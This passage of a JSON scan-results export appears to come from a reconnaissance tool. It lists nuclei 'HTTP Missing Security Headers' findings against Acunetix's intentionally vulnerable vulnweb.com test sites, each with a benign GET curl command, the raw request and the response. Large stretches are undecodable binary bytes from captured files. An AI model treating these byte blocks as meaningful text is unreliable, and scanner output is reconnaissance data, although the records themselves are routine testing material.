篡�ӟO<���bd(����i�n��o\u001b���q��������7z\u0016#�U���������fe^\u001a���.kYrQ�4E�5����d��\u001c\u0002NԠ�\u0010��$w��O�0$\u0012��x���L���\u0004��.�lR�c�H5���Ŭ1��Y\n�\u0006�\\\u0005\u0003�_<�n�՞2��'u�84s�B\u001a��i��J\u0002�*�GI1�a\u0011�6�T��\u000b*�\u000bW�\u001f�~���P`��P��ۻ1w��fbI�9���h��\b����\u0015QI&�\u0001G=z<��\u0015_\u0012�i\u0001/c@��ZS�H��b\u0012��\u0018�K�`R9w,G\u0002\r_S���K�ַZ��~!9�4��5Dc܇jPF\u001cݐ�l}�{4���锉��*fm�����׻h\u0015f��\u0019{z!��\u001d8W`_���\u0005�W`C��o�=M�\fG\u000fu`\u0001���\u0010\u0019%<��fk����I/�4_\u0001�/�f_�,(�HǫРM�=\u0005�?z�mY;����\t\nzu��篃]\u000em|GYꬔ�B�%MY՟�\u0017]<�kkUQ\u0015���V76�D�������\f�������/�p�M\u0010!����o��J�[�;\u001b\u0004_RB�#\u0005��@�� �=8$_�p�Y\nV�2\u0016�%��\u0007��yѨgӘ\r\u0018�=7W��\u001f�\u0016�|\u001b=1��b�+�<�� <O�j�\u0003V玎�+~�Q����x���\u001d��?\u0010O,_��'��C\u001bN�b�<�n\n\u0018��n��\u0018�\u0015d_��N\u0011��;�\fȼ���͑��{4�tq�:HF�I57"�\f�\u0013a�F��������B��'$���\u0019cy^��8���\u001e6�^E�\u000e_����ru��La��\u0019�6�\r\u0005t$\u0017b�\u0016�kn9�U���?�U�m�\u0015��O5|�z#��;.��Ԛ�i*���v�b\u0005� ]mcԟq��\f�l��\t%E�\u001c�'?��O\u0007�'��)�њ8�\u000b�u\u0006�Y���nQ�ߥ�9��\u0002\r\n��W\u0015�����i�u�qFY�)U�n��\u0002��ӽ\u000b$�,~f#(t��87���G>*�}z��/{�@5S��z\u0016�\n�!f�H�\u0019\u0002m\f�6��n�\u001b`\u0005�NVȻ\u0013�9\u0004��]����7W�,�,��_zG\fP@�!�\u0004h��\n\u0005\u0001}�;�p�,��d��Z�O\u0003�j<�t�\b�A2\u001a�\u0013|u�+��*�S�Ԑ\u0011�3���������h��?A�V2\t�,�\u0015��*���A�Zy����d'k*�-�M����n�\u0007��\u0016E�S\u0011C\u000b�%���_�}�50j\u0016#�i�ƀ���W�U��j�y�1\u000b\u0006��\u0013��$��2Q�uA��P��I�2i=�\u001b��\rq�h�P+�\t��$��\r$���x�`��\u0001\u0007�\u0004U����p\u0004E�Ԅt8�Dl!����\u000e��\u0016���%�j&�\u001eÓҸ\u001c�\u0005��uh�eT\by��ہ\u0016v��]��;���k�^��/#6�����l�\b\u0015`\u0002�x\u0007�8�{<�\u0007\u0006�\u0015���ZD�\u0002Á�Z�Yv�3X�x�]�\u000b9:v����\u001c\u001fo��*�t������l'���\u0015d�)�XC����A?�[�;\u001e0̆�\u0006���{$�:\u0011~E�\u001eˌE_�:�cd�6����@\t x\u001f�ZX�0���r\b�\u000b&�X5q��W��\u00114!Ķ(\u000b�P�\u0015�!`�\fQP��\u0016]���S@(n�\u0015<�?sB�h����=\u001e,�&�63��׿mO�ȅ\t I�C\u001c��\u0010�ɽ�ŀ꠆�u\u0004\u001a�#��|�`j��T�\u0014h�1=�\u0004W ݃�&󷦱�fU\u0014\u000b��#�O'��F�>y�\u0013�1���|�&U\u0004�`,{�\n8�g�$���N�!sjň\u00062�]\u001b����Uu�s����s�`t%�T�\u001bzr���\u001bd$h�����&�鿱Q��Z2��J�E3�.��#���\njd3\u0015�L��R�E��d�\u001cw<p:_$N҅�Nc\u0006��\nO���T�5\b�G#iF�\u0011?.����@������Y�y\u001c�̞h*gf\u0014�3-�N��#B;��z���b\u00074t�E�P�ʦ3 ��v��H\u0004\u000b�\u0016y=,���\u0014�"x�\u0002�����J�\u0005J�<�$�\u0004U^Dح�כ\u001dc�c\u001aK��K_���9^\u0018�W�aZ�]��Զ’\u0002�T�\u0006(y��\u000f���9c\u001c<�\u0014���,�t��Y��_o\u0019\u0016������7��b�T��cma��q�Y�^\u0017��N#V+�q�.�C"���L\b�M��:\u0002~�k�|�}�xA�*���8����Y\u00022�*�\u0004\n6��\u0001�\u0003���\u000e+�I\u001e�T\u0004\u0006�*�t�/8Xb��\f�akr��V4��$���Cvp��.W�\b\u001a�\r��5F\u0016�7F�o[�\u001d�#��w}1��n\u0010MHٛ���k��L�,Z��\u0005\u0014Esȫ\u0007�:x�k�U��h�~ߘ���^*��\u0019��8X���|x4L:�Ga����]Z�\u001b,jC9�!�\u001e\b����ŞVaL���Qg9~p\f��+���\u0019�\u001a��l�p�\u0018�Q�\f1'F\u0018a�$g\u0018�\u0018c\u0014�u\u001d��o�\u0018bR���\u0018`�F\u0018a�$a�\u0018�Fr�\u0018bF�a�\u0018(���", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 969, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 112, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "x-content-type-options", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/9.1.2 Safari/605.1.15' 'http://www.vulnweb.com'", + "type": "http", + "http_url": "http://www.vulnweb.com", + "discovered_date": "2024-11-13T02:42:39.248Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET / HTTP/1.1\r\nHost: www.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/9.1.2 Safari/605.1.15\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nTransfer-Encoding: chunked\r\nContent-Type: text/html\r\nDate: Wed, 13 Nov 2024 02:42:26 GMT\r\nEtag: W/"5f1fedf1-fb2"\r\nLast-Modified: Tue, 28 Jul 2020 09:20:49 GMT\r\nServer: nginx/1.19.0\r\n\r\n<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">\n<html xmlns="http://www.w3.org/1999/xhtml">\n<head>\n<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />\n<title>Acunetix Web Vulnerability Scanner - Test websites</title>\n<style type="text/css">\n<!--\n@import url("style.css");\n-->\n</style>\n</head>\n<body>\n\n\n<center>\n<br>\n\n<a href='https://www.acunetix.com/'><img src='acunetix-logo.png' border='0' alt="Acunetix website security"></a><br><br>\n<div>Vulnerable test websites for <a href='https://www.acunetix.com/vulnerability-scanner/'>Acunetix Web Vulnerability Scanner</a>.</div>\n\n<table id="one-column-emphasis" summary="Acunetix test websites" style="width:60%">\n <colgroup>\n \t<col>\n </colgroup>\n <thead>\n \t<tr style="font-size:14px">\n \t<th scope="col"><b>Name</b></th>\n <th scope="col"><b>URL</b></th>\n <th scope="col"><b>Technologies</b></th>\n\t\t\t<th scope="col"><b>Resources</b></th>\n </tr>\n </thead>\n <tbody>\n \t<tr style="font-size:14px">\n \t<td>SecurityTweets</td>\n <td><a href='http://testhtml5.vulnweb.com/'>http://testhtml5.vulnweb.com</a></td>\n <td>nginx, Python, Flask, CouchDB</td>\n\t\t\t<td><a href='https://www.acunetix.com/vulnerability-scanner/html5-website-security/'>Review</a> Acunetix HTML5 scanner or <a href='https://www.acunetix.com/vulnerability-scanner/crawling-html5-javascript-websites/'>learn more</a> on the topic.</td>\n </tr>\n \t<tr style="font-size:14px">\n \t<td>Acuart</td>\n <td><a href='http://testphp.vulnweb.com/'>http://testphp.vulnweb.com</a></td>\n <td>Apache, PHP, MySQL</td>\n\t\t\t<td><a href='https://www.acunetix.com/vulnerability-scanner/php-security-scanner/'>Review</a> Acunetix PHP scanner or <a href='https://www.acunetix.com/blog/articles/prevent-sql-injection-vulnerabilities-in-php-applications/'>learn more</a> on the topic.</td>\n </tr>\n \t<tr style="font-size:14px">\n \t<td>Acuforum</td>\n <td><a href='http://testasp.vulnweb.com/'>http://testasp.vulnweb.com</a></td>\n <td>IIS, ASP, Microsoft SQL Server</td>\n\t\t\t<td><a href='https://www.acunetix.com/vulnerability-scanner/sql-injection/'>Review</a> Acunetix SQL scanner or <a href='https://www.acunetix.com/websitesecurity/sql-injection/'>learn more</a> on the topic.</td>\n </tr>\n \t<tr style="font-size:14px">\n \t<td>Acublog</td>\n <td><a href='http://testaspnet.vulnweb.com/'>http://testaspnet.vulnweb.com</a></td>\n <td>IIS, ASP.NET, Microsoft SQL Server</td>\n\t\t\t<td><a href='https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/'>Review</a> Acunetix network scanner or <a href='https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/'>learn more</a> on the topic.</td>\n </tr>\n\t\t<tr style="font-size:14px">\n \t<td>REST API</td>\n <td><a href='http://rest.vulnweb.com/'>http://rest.vulnweb.com/</a></td>\n <td>Apache, PHP, MySQL</td>\n\t\t\t<td><a href='https://www.acunetix.com/blog/articles/rest-api-security-testing-acunetix/'>Review</a> Acunetix scanner or <a href='https://www.acunetix.com/blog/articles/rest-api-security-testing-acunetix/'>learn more</a> on the topic.</td>\n </tr>\n </tbody>\n</table>\n\n<div style="background-color:lightgray;width:60%;text-align:center;font-size:14px">\n<p style="padding-left:140px;padding-right:140px"><b>Warning</b>: This site hosts intentionally vulnerable web applications. You can use these applications to understand how programming and configuration errors lead to security breaches. We created the site to help you test Acunetix but you may also use it for manual penetration testing or for educational purposes. It will help you learn about vulnerabilities such as SQL Injection, Cross-site Scripting (XSS), Cross-site Request Forgery (CSRF), and many more.</p>\n</div>\n</center>\n\n</body>\n</html>\n", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 970, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 1, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "strict-transport-security", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36' 'http://vulnweb.com'", + "type": "http", + "http_url": "http://vulnweb.com", + "discovered_date": "2024-11-13T02:42:39.501Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET / HTTP/1.1\r\nHost: vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nTransfer-Encoding: chunked\r\nContent-Type: text/html\r\nDate: Wed, 13 Nov 2024 02:42:26 GMT\r\nEtag: W/"5f1fedf1-fb2"\r\nLast-Modified: Tue, 28 Jul 2020 09:20:49 GMT\r\nServer: nginx/1.19.0\r\n\r\n<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">\n<html xmlns="http://www.w3.org/1999/xhtml">\n<head>\n<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />\n<title>Acunetix Web Vulnerability Scanner - Test websites</title>\n<style type="text/css">\n<!--\n@import url("style.css");\n-->\n</style>\n</head>\n<body>\n\n\n<center>\n<br>\n\n<a href='https://www.acunetix.com/'><img src='acunetix-logo.png' border='0' alt="Acunetix website security"></a><br><br>\n<div>Vulnerable test websites for <a href='https://www.acunetix.com/vulnerability-scanner/'>Acunetix Web Vulnerability Scanner</a>.</div>\n\n<table id="one-column-emphasis" summary="Acunetix test websites" style="width:60%">\n <colgroup>\n \t<col>\n </colgroup>\n <thead>\n \t<tr style="font-size:14px">\n \t<th scope="col"><b>Name</b></th>\n <th scope="col"><b>URL</b></th>\n <th scope="col"><b>Technologies</b></th>\n\t\t\t<th scope="col"><b>Resources</b></th>\n </tr>\n </thead>\n <tbody>\n \t<tr style="font-size:14px">\n \t<td>SecurityTweets</td>\n <td><a href='http://testhtml5.vulnweb.com/'>http://testhtml5.vulnweb.com</a></td>\n <td>nginx, Python, Flask, CouchDB</td>\n\t\t\t<td><a href='https://www.acunetix.com/vulnerability-scanner/html5-website-security/'>Review</a> Acunetix HTML5 scanner or <a href='https://www.acunetix.com/vulnerability-scanner/crawling-html5-javascript-websites/'>learn more</a> on the topic.</td>\n </tr>\n \t<tr style="font-size:14px">\n \t<td>Acuart</td>\n <td><a href='http://testphp.vulnweb.com/'>http://testphp.vulnweb.com</a></td>\n <td>Apache, PHP, MySQL</td>\n\t\t\t<td><a href='https://www.acunetix.com/vulnerability-scanner/php-security-scanner/'>Review</a> Acunetix PHP scanner or <a href='https://www.acunetix.com/blog/articles/prevent-sql-injection-vulnerabilities-in-php-applications/'>learn more</a> on the topic.</td>\n </tr>\n \t<tr style="font-size:14px">\n \t<td>Acuforum</td>\n <td><a href='http://testasp.vulnweb.com/'>http://testasp.vulnweb.com</a></td>\n <td>IIS, ASP, Microsoft SQL Server</td>\n\t\t\t<td><a href='https://www.acunetix.com/vulnerability-scanner/sql-injection/'>Review</a> Acunetix SQL scanner or <a href='https://www.acunetix.com/websitesecurity/sql-injection/'>learn more</a> on the topic.</td>\n </tr>\n \t<tr style="font-size:14px">\n \t<td>Acublog</td>\n <td><a href='http://testaspnet.vulnweb.com/'>http://testaspnet.vulnweb.com</a></td>\n <td>IIS, ASP.NET, Microsoft SQL Server</td>\n\t\t\t<td><a href='https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/'>Review</a> Acunetix network scanner or <a href='https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/'>learn more</a> on the topic.</td>\n </tr>\n\t\t<tr style="font-size:14px">\n \t<td>REST API</td>\n <td><a href='http://rest.vulnweb.com/'>http://rest.vulnweb.com/</a></td>\n <td>Apache, PHP, MySQL</td>\n\t\t\t<td><a href='https://www.acunetix.com/blog/articles/rest-api-security-testing-acunetix/'>Review</a> Acunetix scanner or <a href='https://www.acunetix.com/blog/articles/rest-api-security-testing-acunetix/'>learn more</a> on the topic.</td>\n </tr>\n </tbody>\n</table>\n\n<div style="background-color:lightgray;width:60%;text-align:center;font-size:14px">\n<p style="padding-left:140px;padding-right:140px"><b>Warning</b>: This site hosts intentionally vulnerable web applications. You can use these applications to understand how programming and configuration errors lead to security breaches. We created the site to help you test Acunetix but you may also use it for manual penetration testing or for educational purposes. It will help you learn about vulnerabilities such as SQL Injection, Cross-site Scripting (XSS), Cross-site Request Forgery (CSRF), and many more.</p>\n</div>\n</center>\n\n</body>\n</html>\n", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 971, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "cross-origin-resource-policy", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 11_11) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4883.150 Safari/537.36' 'http://testphp.vulnweb.com/wvstests'", + "type": "http", + "http_url": "http://testphp.vulnweb.com/wvstests", + "discovered_date": "2024-11-13T02:42:39.781Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /wvstests HTTP/1.1\r\nHost: testphp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 11_11) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4883.150 Safari/537.36\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nTransfer-Encoding: chunked\r\nContent-Type: text/html\r\nDate: Wed, 13 Nov 2024 02:42:27 GMT\r\nServer: nginx/1.19.0\r\n\r\n<html>\r\n<head><title>Index of /wvstests/</title></head>\r\n<body>\r\n<h1>Index of /wvstests/</h1><hr><pre><a href="../">../</a>\r\n<a href="pmwiki_2_1_19/">pmwiki_2_1_19/</a> 08-Apr-2013 08:44 -\r\n</pre><hr></body>\r\n</html>\r\n", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 972, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "strict-transport-security", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36 Edg/91.0.864.59' 'http://testphp.vulnweb.com/wvstests/pmwiki_2_1_19'", + "type": "http", + "http_url": "http://testphp.vulnweb.com/wvstests/pmwiki_2_1_19", + "discovered_date": "2024-11-13T02:42:40.038Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /wvstests/pmwiki_2_1_19 HTTP/1.1\r\nHost: testphp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36 Edg/91.0.864.59\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nTransfer-Encoding: chunked\r\nContent-Type: text/html\r\nDate: Wed, 13 Nov 2024 02:42:25 GMT\r\nServer: nginx/1.19.0\r\n\r\n<html>\r\n<head><title>Index of /wvstests/pmwiki_2_1_19/</title></head>\r\n<body>\r\n<h1>Index of /wvstests/pmwiki_2_1_19/</h1><hr><pre><a href="../">../</a>\r\n<a href="scripts/">scripts/</a> 08-Apr-2013 08:44 -\r\n</pre><hr></body>\r\n</html>\r\n", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 973, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "strict-transport-security", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:24.0) Gecko/20100101 Firefox/24.0' 'http://testphp.vulnweb.com/pictures/6.jpg.tn'", + "type": "http", + "http_url": "http://testphp.vulnweb.com/pictures/6.jpg.tn", + "discovered_date": "2024-11-13T02:42:40.303Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /pictures/6.jpg.tn HTTP/1.1\r\nHost: testphp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:24.0) Gecko/20100101 Firefox/24.0\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nContent-Length: 4345\r\nAccept-Ranges: bytes\r\nContent-Type: application/octet-stream\r\nDate: Wed, 13 Nov 2024 02:42:20 GMT\r\nEtag: "4dca64a1-10f9"\r\nLast-Modified: Wed, 11 May 2011 10:27:45 GMT\r\nServer: nginx/1.19.0\r\n\r\n����\u0010JFIF\u0001\u0001\u0001\u0001��C\u0006\u0004\u0005\u0006\u0005\u0004\u0006\u0006\u0005\u0006\u0007\u0007\u0006\b\n\u0010\n\n\t\t\n\u0014\u000e\u000f\f\u0010\u0017\u0014\u0018\u0018\u0017\u0014\u0016\u0016\u001a\u001d%\u001f\u001a\u001b#\u001c\u0016\u0016 , #&')*)\u0019\u001f-0-(0%()(��C\u0001\u0007\u0007\u0007\n\b\n\u0013\n\n\u0013(\u001a\u0016\u001a((((((((((((((((((((((((((((((((((((((((((((((((((��\u0011\bd�\u0003\u0001"\u0002\u0011\u0001\u0003\u0011\u0001��\u001d\u0001\u0001\u0005\u0001\u0001\u0001\u0004\u0003\u0005\u0006\u0007\b\t\u0002\u0001��:\u0010\u0002\u0001\u0003\u0003\u0002\u0005\u0001\u0006\u0004\u0004\u0007\u0001\u0001\u0002\u0003\u0004\u0011\u0005\u0012!\u00061\u0007\u0013"AQa\u00142q���\u0015#B�\bR��\u0016$br������\u001b\u0001\u0001\u0005\u0001\u0001\u0001\u0002\u0003\u0004\u0006\u0005\u0007��0\u0011\u0002\u0002\u0001\u0003\u0003\u0001\u0006\u0005\u0005\u0001\u0001\u0002\u0003\u0011\u0004!1\u0005\u0012A"\u0006\u0013\u0014aq�2����BQ������\f\u0003\u0001\u0002\u0011\u0003\u0011?�JR��~���'�\rz5���[��PU�pT\u0012\t�$�a߷֛)�\u001f��T��ĩUn ��y!�7�Xث��\n�pA\u0007�~C\u001b�*�\u0012���*���O`)�\u0014�[n?\u000bm���_��Fv���@Hls���X���:�u\u000f��ݣ�e.��"�G�#<7��#\u0004�0Mh�)�q.\t\u001dR^\t�\u0015�\u0017�]iڽ��-�\u0013,',���\u0018��<�;��gu\u001e�\u000e����P\t�e�7*��'����M��\fVR�LH������\f\u001c�ˑ�\u0007\u0015�i]=\u0012�+.X\u00101���9\u0003۵f��I����\u0005��Ma\u001cg��M�^�kp1$M��\u0010\u000f�\u0019��\u0011�"�WV�/OEu%�\u0017\u0010�,�ݸ>p0�l��\u0003 �\\v��=K�E�ot���[iZ3�\n�\u0001����\u001f��E���;rS��[-ԥ*�\b�)@\nR��)@\nR�DŽ�\u001a����x��\u0012��६�C ~1�\u001c烐p1ۜT:�Ezx;,xHt ���/��[T��Oan��\u0014�6]FH ��~\u000e����Ji��\u0014��j;���OW�\u001f�\u001f53��4��n$��9\u0012eo0�`�b�9\u0001�#,��\u0004��Y����.\u0012g�[{�\\1\f������������azj����->���Ma��\u0011�ꚽ��\u0018f�G�q\u0012&�&3��Q�0T��������E�[^�Is�tp�[1\f{�\r��~\u0004�z�5�G\u0012eG�:�@8'�\u001e@� \u0001��H�\\6����8�� �\u001c�ƌz��;��1�y��\u0013\\�=���\n*\\~ÝUJO(�ZD!\u0002$��e�\u000eCn\u001fF\u001c\u001fʯ�t�w�K\u001cc\u0002u-\u001b�68�\u0019?\\sߜ�qY���$���뱉b\n���>~�Z��8S�Q���s�U;z����̙(��[�X]DV\u001b�W}�\u0002\\\t\u001c\u001e���\b�Y��h�F��\n4��a��8�l�\u001e;�\u0013�*�5��^-��3�\u0001 pO������k\u0003\u0018�n#B\u0019J�<�\u001e��]F��/�'zQ��d�0\\}�y\u001b|ou4H\u0013��Y�g#��3\\��$�\u0017�����A"G�Z��1�y�&7���3��}��.���NH��0�\r�g\t�L\u0012���X\u000f�\u001e\u001f���ؠ��\u001e�\f�u��p��\f��\u0014�\\��\u0007\u0007\u0018=N��#��E��/)���7�{\f.N �JԬ��o�,�#1����J��������*-zj�tr�*�A"���a\u0013�"�\u000e\u000b\t������@\nR��)@\nݽ\u0019�\u000e��tJi7�;\u000f�\b\u001d\u0004W6Q�^bn\u001b��r�\u0001݇\fG�q��*U}N��TT-YI�t&��\u0013�n���7�tKy�n-�%x\u0004�\bϨ\f.C\u0002ʳ\u0005$pH8�\b[��"]�-���,�r-\\\u0004i��#.Oel\u0010\u001b�;O#\u0019�O\n�@��}n9�.�\u000f i�\u0007��o�\u0003�\nϺ��[�g�4�m<�:��Y��+mf���n�\u0015�M��Fw��\u0007z�_�ŰԿq�1��\u001f,y-���[��}2�\u0005 x�Q<Bkq'\u000f�\u0003r���I\u0003\u001f\u0004|\u001a�%�b΀�\u0007'��.��g�����ݕ����\u0015i!�+�1�\u0001\u000e�%�\u0018����F+=�b��1ナ�YMt݋��ș�\u0019Dt��\u0014\\�\u000e_fcRC}x�\u000fDZ�>�\rݵմ�kr�\u0016��ψ��^0Ɂ�\\\u0013�\u00169<�\u0001W8�Y�z\u0015<�;Np�����U\u0003�\u0004\u000eǸ��Дc?W\u0001��"�\\%�@��'\u0001��ʺ�����=�\u001a�P��7��\u001f� �K;��\u001c��\u0006\t\\z�\u0017�\u0005��0��rx\u0018\u0019�n)�M��_�G"5�I%��\t\u0002V�����qT��/,\u000e�\u0019]C�\u0003��\n��\u0003R���a\u0001\u0016�\u0014h�E��1\u0004�p\u000f\u001f8��QU\\��\u0016^E�74w��\u0010�p�sG�b�\u0015\u0001fE?˺���l\u0003\u001e;\u0006��.\u0003ᯄ6�\u00163[u��MQ�%b��hT*�0R;�'��\\`溺�$��<�(0�\u0018�|`��U�P��]ķ�!�B�>0T�a\t��\u0019\u001e�\u0011�gAG]�Q��f���RǏ��"�\u001c��5~��t��M�6��$p��I��+�m�\f\u0002{�x��9\u000bZ�.�mR�O�����r���<\u0010\u000e\b�}\rz;\fP�\u001cN�dP7F㜃��pG��\\��'|5�L\u000f�Z4\u0011��)k����I�#.J�z\u0007$�=9�8\u0002�~�u��t^��\u001f_�3Q\u00055���\\�)[€�)@\nR��)@\u001d5�7�K'H�\u001a���}.O9\u001eFr\u0004\u001d�*�\u000b(�\r��v\u001c1<o��EK[����1R$i\u000b\u0015�c@����\r���\u001c�\n��@�nt]R\u001b�6ı��̧�S��Eu����%��q̗��л\u001c\u0003�$�\u0019��)��\f�\rb���**WU���Ogz�f�Ԅ����\u001d��-< *��d1��\u0014c<\u001f�q����j���Im$��:\u000f0\u0014V_Ab\u0007��\u0004\u0015*W$����Z����;M\u0006�SYLRYrʌ]��\u0014\u000e\u0007��\u00198�\t�lU�ÿ\u0013���d�\u0013ej���e���\u001f��\u0018e*�6{z\u0018}�\u000e\u001d\u001d3U\n%j_-��G�4�2����������1��bIc�f\u0001ܣ%\u001aA�'�RN\u0014\n�b>ߤ���>Z2�g\b��r��r\n�#���-N���\t�l�2�BF\u000f�\u0011�E}i��'��ܬ2yh��lM����@?�\u000f\u001d��)O�\u0012�"4��\u0017\u000b4A�ӆ(�N@e$0\u0007\u0003 \u0010Goj4�b��W\u0002\t1�g<q��?\u000b�1���N\u0013��X���8\u000e��1\u001a�\u0007�rs��J�4{�{eNy��l���N�'\r��ڟ%��9?�\\H��樑d\u000e�y�vc\u0018�l\u001eC\f��c?��u\u0017�:�\u0018\u0015 ���9\u0007����E��h�f��N�? g�##>٩v�)q\n�\u0013\u0006\f��\u001d�����9+������5�أ%��}�\u0018x݁uw<r2�y�\u0019�܏bI0z�N�R���h�{gc�G*���F\u0018!�\u000er;\f��o�!�X���v��\u0003\u0003;� d�H'\u0007��y\u0014Yb����/\u001f���\u0016����Bj:O^����ks~��e��\u000b��\f7#�\u0001�Or\u0006\u0001\f=��ֽ\u0019��eݬ\u001a�������Ȍ\u001d\u001cP\f?�O\u0004w\u0007�A=ܶV�k�$� 